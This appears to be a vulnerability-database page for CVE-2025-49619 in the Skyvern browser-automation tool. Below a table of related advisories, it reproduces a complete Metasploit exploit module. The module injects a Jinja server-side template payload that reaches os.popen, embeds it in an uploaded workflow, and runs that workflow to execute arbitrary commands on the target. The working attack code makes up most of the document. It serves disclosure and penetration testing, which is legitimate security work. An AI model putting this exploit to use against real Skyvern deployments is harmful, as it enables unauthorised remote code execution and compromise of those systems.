| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| Exploit for CVE-2025-49619 | 9 Jun 202510:09 | – | githubexploit | |
| The vulnerability of the software for automating browser processes in Skyvern lies in the lack of measures to neutralize special elements in the template creation mechanism. This allows a perpetrator to execute arbitrary code. | 1 Jun 202600:00 | – | bdu_fstec | |
| CVE-2025-49619 | 7 Jun 202514:30 | – | circl | |
| Ikonomos Skyvern 安全漏洞 | 7 Jun 202500:00 | – | cnnvd | |
| CVE-2025-49619 | 7 Jun 202500:00 | – | cve | |
| CVE-2025-49619 | 7 Jun 202500:00 | – | cvelist | |
| Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI | 15 Jun 202500:00 | – | exploitdb | |
| Skyvern has a Jinja runtime leak | 7 Jun 202515:30 | – | github | |
| CVE-2025-49619 | 7 Jun 202514:15 | – | nvd | |
| CVE-2025-49619 | 7 Jun 202500:00 | – | osv |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Skyvern SSTI Remote Code Execution',
'Description' => %q{
This module exploits SSTI vulnerability in Skyvern<=0.1.84. The module requires API key to deliver requests and upload malicious workflow.
},
'License' => MSF_LICENSE,
'Author' => [
'Cristian Branet', # researcher
'msutovsky-r7' # module dev
],
'References' => [
[ 'EDB', '52335' ],
[ 'URL', 'https://cristibtz.blog/posts/CVE-2025-49619/'],
[ 'CVE', '2025-49619']
],
'Targets' => [
[
'Linux Target',
{
'Platform' => %w[linux],
'Arch' => ARCH_CMD
}
]
],
'Payload' => { 'BadChars' => %(") },
'DisclosureDate' => '2025-06-07',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('API_KEY', [true, 'API key for Skyvern', ''])
])
end
def create_workflow_json
{
title: Rex::Text.rand_text_alphanumeric(8),
description: '',
proxy_location: 'RESIDENTIAL',
webhook_callback_url: '',
persist_browser_session: false,
model: nil,
totp_verification_url: nil,
workflow_definition: {
parameters: [],
blocks: [
{
label: 'block_1',
continue_on_failure: false,
block_type: 'task_v2',
prompt: %<{% for x in ().__class__.__base__.__subclasses__() %}\n {% if 'warning' in x.__name__ %}\n {{ x()._module.__builtins__['__import__']('os').popen("#{payload.encoded}").read() }}\n {% endif %}\n{% endfor %}>,
url: '',
max_steps: 25,
totp_identifier: nil,
totp_verification_url: nil
}
]
},
is_saved_task: false
}
end
def create_workflow
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/api/v1/workflows'),
'headers' => { 'X-API-Key': datastore['API_KEY'] },
'ctype' => 'application/json',
'data' => create_workflow_json.to_json
})
fail_with(Failure::UnexpectedReply, 'Received unexpected response') unless res&.code == 200
res_json = res.get_json_document
@workflow_id = res_json.fetch('workflow_permanent_id', nil)
fail_with(Failure::Unknown, 'Failed to upload workflow') unless @workflow_id
end
def trigger_workflow
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/api/v1/workflows/', @workflow_id, '/run'),
'headers' => { 'X-API-Key': datastore['API_KEY'] },
'ctype' => 'application/json',
'data' => { workflow_id: @workflow_id }.to_json
})
fail_with(Failure::UnexpectedReply, 'Received unexpected response') unless res&.code == 200
res_json = res.get_json_document
fail_with(Failure::Unknown, 'Failed to upload workflow') unless res_json.fetch('workflow_id', nil) || res_json.fetch('workflow_run_id', nil)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/api/v1/workflows'),
'headers' => { 'X-API-Key': datastore['API_KEY'] }
})
return Exploit::CheckCode::Safe('Target is probably not Skyvern') unless res&.code == 200
res_json = res.get_json_document
return Exploit::CheckCode::Unknown('Failed to get additional information - target is either not Skyvern or you used incorrect API key') unless res_json
Exploit::CheckCode::Detected('Target is Skyvern')
end
def exploit
create_workflow
trigger_workflow
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation